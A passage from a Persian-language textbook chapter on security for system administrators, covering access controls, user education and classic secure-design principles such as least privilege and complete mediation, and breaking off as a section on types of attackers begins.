ﺑﺘﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﺷﺒﻜﻪ ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ،ﻛﺎﺭﺑﺮﺍﻥ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ
ﺁﺯﻣﺎﻳﺶ ﻧﺸﺪﻩ ﻭ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﺩﻭﺭﻩﺩﻳﺪﻩ ﻭ ﻣﺠﺎﺯ ﺗﺄﻳﻴﺪ ﻧﺸﺪﻩ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ.
ﺭﺍﻫﺒﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺑﺮﺩ ﺑﺮﺧﻲ ﺍﺯ ﺍﺻﻮﻝ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺣﺪ ﻣﻌﻘﻮﻝ ،ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺎﻻ ﺑﺒﺮﻧـﺪ .ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺑﺠـﺎﻱ ﺣـﺬﻑ ﻫﻤـﺔ
ﻛﺎﻣﭙﺎﻳﻠﺮﻫﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺍﺯ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ،ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻀﻮ ﺩﺭ ﻳـﻚ ﮔـﺮﻭﻩ ﻛـﺎﺭﺑﺮﻱ
ﺧﺎﺹ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻳﻨﮕﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ
ﻛﻪ ﺩﻗﺘﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺭﺩﻩﻫـﺎﻱ ﺍﺑـﺰﺍﺭ
ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ ،ﻣﺎﻧﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺒﺎﺭ .Usenetﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺩﻳﺪﮔﺎﻩ ﺳﻨﺘﻲ ﺑﻪ "ﺩﺍﺩﻩ" ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ
)ﺍﺯ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ( ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺠﺎﻱ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺑﺮﺍﻱ ﻫﻤﻪ ،ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﻣﺤﺎﻓﻈﺖ ﺷـﻮﻧﺪ .ﺗﻨﻈـﻴﻢ ﺻـﺤﻴﺢ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ،ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺎﻳﻪﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ٢٨ﺩﻭ ﻣﺜﺎﻝ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﺳﺎﺩﻩ
ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺗﻤﺎﻡ Unixﺑﻬﺒﻮﺩ ﺑﺨﺸﺪ.
ﺣﻴﺎﺗﻲﺗﺮﻳﻦ ﻭﺟﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ Unixﻭﺍﺩﺍﺭ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺍﺳﺖ .ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑـﻪ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺷﺨﺼﻲ ﻗﺒﻞ ﺍﺯ Microsoft Windwos NTﻋﺎﺩﺕ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺒﺘﻨﻲ ﺑﺮ NTﻧﻴﺰ ﺻﺪﻕ ﻣﻲﻛﻨﺪ .ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﺗﺤـﺼﻴﻼﺕ ،ﺁﮔـﺎﻫﻲ ،ﻭ ﺍﻳﺠـﺎﺩ ﺍﻧﮕﻴـﺰﻩ ﺍﺳـﺖ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻫﺴﺘﻨﺪ ،ﻭﻟﻲ ﺗﺠﺮﺑﻪ ﻛﺮﺍﺭﹰﺍ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻣﺸﻜﻼﺕ ﻓﺮﺩﻱ ﺑﺎ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻓﻨـﺎﻭﺭﻱ ﻗﺎﺑـﻞ ﺣـﻞ
ﻧﻴﺴﺘﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻲ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ ﻛﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻧﭽـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﻛﻤﺘـﺮ
ﺗﻬﺪﻳﺪﻛﻨﻨﺪﻩ ﺑﻮﺩ .ﺑﺎ ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺕ ﻣﻮﺟﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﻫﻤﻜﺎﺭﻱ ﺁﻧﺎﻥ ﭼﻘﺪﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻛﻨـﺪ،
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ .ﺑﺎ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﺻﺤﻴﺢ ﺩﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ ،ﺁﻧﻬﺎ ﺭﺍ ﺑﺨـﺸﻲ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ
ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﻴﺪ .ﺁﻣﻮﺯﺵ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﻬﺘﺮ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻧﺘﻴﺠﻪ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﻫﻢ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ .ﺁﻣﻮﺯﺵ ﺑﺪﻭﻥ ﺍﻧﮕﻴﺰﺵ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﻪ
ﺁﻥ ﻣﻔﻬﻮﻡ ﺑﺎﺷﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻋﻤﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﺪﻭﻥ ﺁﻣﻮﺯﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﻛﺎﺭﻫﺎﻱ
ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ،ﺷﻜﺎﻑ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻓﺼﻞ ﺩﻭﻡ
ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳﻲ ﺍﺭﺍﺋﻪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺑﺤﺚ ﻣﻲﻛﻨﺪ ،ﻭ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ
ﻛﻪ ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺣﻤﻠﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺘﺪﺍﻭﻝ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ ﻭ ﻣﻄﺎﻟﻌﺔ ﻣﻮﺭﺩﻱ ﻳﻚ ﻧﻤﻮﻧﻪ
ﺣﻤﻠﻪ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ.
ﺍﻣﻨﻴﺖ ﻭ ﺭﺍﻫﺒﺮﺍﻥ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻫﺒﺮ ﻓﻨﻲ ،ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻛـﺎﺭ
ﻛﻨﻨﺪ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺗﻌﺎﺭﻳﻒ ﺭﺳﻤﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﻣﻔﻴـﺪ ﺑـﺮﺍﻱ ﺭﺍﻫﺒـﺮﺍﻥ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻳﻨﻜـﻪ" :ﻳـﻚ
ﻛﺎﻣﭙﻴﻮﺗﺮ ﺩﺭﺻﻮﺭﺗﻲ ﺍﻳﻤﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﺵ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ ﻛﻪ ﺁﻧﻄﻮﺭ ﺭﻓﺘﺎﺭ ﻛﻨﻨﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ".
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻛﺮﺩﻩﺍﻳﺪ ﺗﺎ ﭼﻨﺪ ﻫﻔﺘﻪ ﺩﺭ ﺁﻥ ﺑﻤﺎﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ ﻫﻤﭽﻨﺎﻥ ﻧﺎﺧﻮﺍﻧـﺪﻩ ﺑﻤﺎﻧـﺪ،
ﺁﻧﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻣﻨﻴﺖ ﻳﻚ ﻭﻇﻴﻔﺔ ﺣﺴﺎﺱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻧﻘﺸﻬﺎﻱ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﺳﺖ .ﺑـﺎ ﺍﻳـﻦ ﺗﻌﺮﻳـﻒ ،ﻓﺎﺟﻌـﻪﻫـﺎﻱ
ﻃﺒﻴﻌﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﻜﺎﻝﺩﺍﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺗﻬﺪﻳﺪ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ.
ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ
ﻫﺮ ﻛﺎﺭﺑﺮ ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﺑﺎﻳﺪ ﺍﺯ ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﺑـﺪﺧﻮﺍﻩ
ﻭ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺗﻮﺳﻂ ﺧﻄﺎﻫﺎ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ .ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﻮﻧﺪ،
ﺑﺎﻳﺪ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﻪ ﺁﻧﻬﺎ ﺍﺧﺘﺼﺎﺹ ﻳﺎﺑﻨﺪ.
ﻣﻜﺎﻧﻴﺰﻡ ﺍﻗﺘﺼﺎﺩﻱ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻛﻮﭼﻚ ﻭ ﺳﺎﺩﻩ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻭ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ.
ﻣﻴﺎﻧﺠﻴﮕﺮﻱ ﻛﺎﻣﻞ
ﻫﺮ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﺍﺷﺘﻦ ﻣﺠﻮﺯ ﺻﺤﻴﺢ ﻛﻨﺘﺮﻝ ﺷﻮﺩ.
ﻃﺮﺍﺣﻲ ﺑﺎﺯ
٣١
ﺍﻳﻤﻨﻲ ﻧﺒﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺟﻬﻞ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺿﺎﺑﻄﻪ ﺍﺯ ﻭﺟﻮﺩ ﺩﺭﺏ ﻣﺨﻔﻲ ﺳﻴﺴﺘﻢ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺁﻧـﺮﺍ ﻣـﻲﺷﻨﺎﺳـﻨﺪ
ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺩﻫﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ.
ﺟﺪﺍﺳﺎﺯﻱ ﺩﺳﺘﺮﺳﻴﻬﺎ
ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ،ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺷﺮﻁ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﭘﺬﻳﺮﺵ ﺭﻭﺍﻧﻲ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺁﺳﺎﻥ ﺑﺎﺷﻨﺪ ﺗﺎ ﺩﺭ ﻋﻤﻞ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻧﺸﻮﻧﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻃﺮﺍﺣﺎﻥ ﻫﻴﭽﮕﺎﻩ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺭﺍ ﻳﺎﺩ ﻧﻤﻲﮔﻴﺮﻧﺪ ،ﺍﮔﺮ ﻫﻢ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻳﺎﺩ ﻣﻲﺑﺮﻧﺪ ،ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﻣﻴﺎﻧﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻳﺎ
ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺍﻫﻤﻴﺖ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭﮔﻴﺮ ﺁﻥ ﻧﻤﺎﻳﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ،ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻓﺮﺍﻭﺍﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺮﺍﺣﻲ ﻧﺎﻗﺺ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻌﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﻣـﺪﻋﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ .ﻃﺮﺍﺣﻲ ﻧﺎﻣﻨﺎﺳﺐ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻭ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﻣﻲﺷﻮﺩ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ ﻭ ﻳﺎ ﻋﺎﻣﺪﺍﻧﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺑﮕﻴﺮﺩ.
31 Backdoor
32 Blackbox Testing
33 Microsoft Internet Information Server
34 Apache Web Server
٢٦٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻝ ﺣﺎﺿﺮ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ ،ﻋﻤﺪﺗﹰﺎ ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﻫﺮ ﺧﻂ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻫﺴﺘﺔ ﺍﺻـﻠﻲ ،٣٥ﺗﻮﺳـﻂﺍﻳﻤﻦﺗﺮﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺣﺎ ﹺ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺶ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻤﻴﺰﻱ ﺷﺪﻩ ﺍﺳﺖ .ﻫﺴﺘﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺩﻳﮕـﺮ -ﺍﺯ ﺟﻤﻠـﻪ - Linuxﺑـﻪ ﺍﻳـﻦ
ﺷﺪﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﻭ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺯ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ .ﻣﺸﻜﻞ ﻣﻲﺗـﻮﺍﻥ ﺩﺭﺟـﻪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘـﻲ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ Unixﺍﺯ ﻗﺒﻴﻞ Solarisﺭﺍ ﺩﺍﻧﺴﺖ.
ﺷﻨﺎﺧﺘﻦ ﻣﻬﺎﺟﻢ
ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﺑﺎ ﺧﺒﺮﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﻣﻲﻛﻨﺪ؟ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺗﻘﺮﻳﺒـﹰﺎ ﺍﻫﻤﻴﺘـﻲ ﻧـﺪﺍﺭﺩ؛ ﻳﻌﻨـﻲ ﻣﻬـﻢ ﻧﻴـﺴﺖ
ﻣﻬﺎﺟﻤﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻪ ﻛﺴﺎﻧﻲ ﺑﺎﺷﻨﺪ ،ﺑﻠﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ.
Script Kiddieﻫﺎ
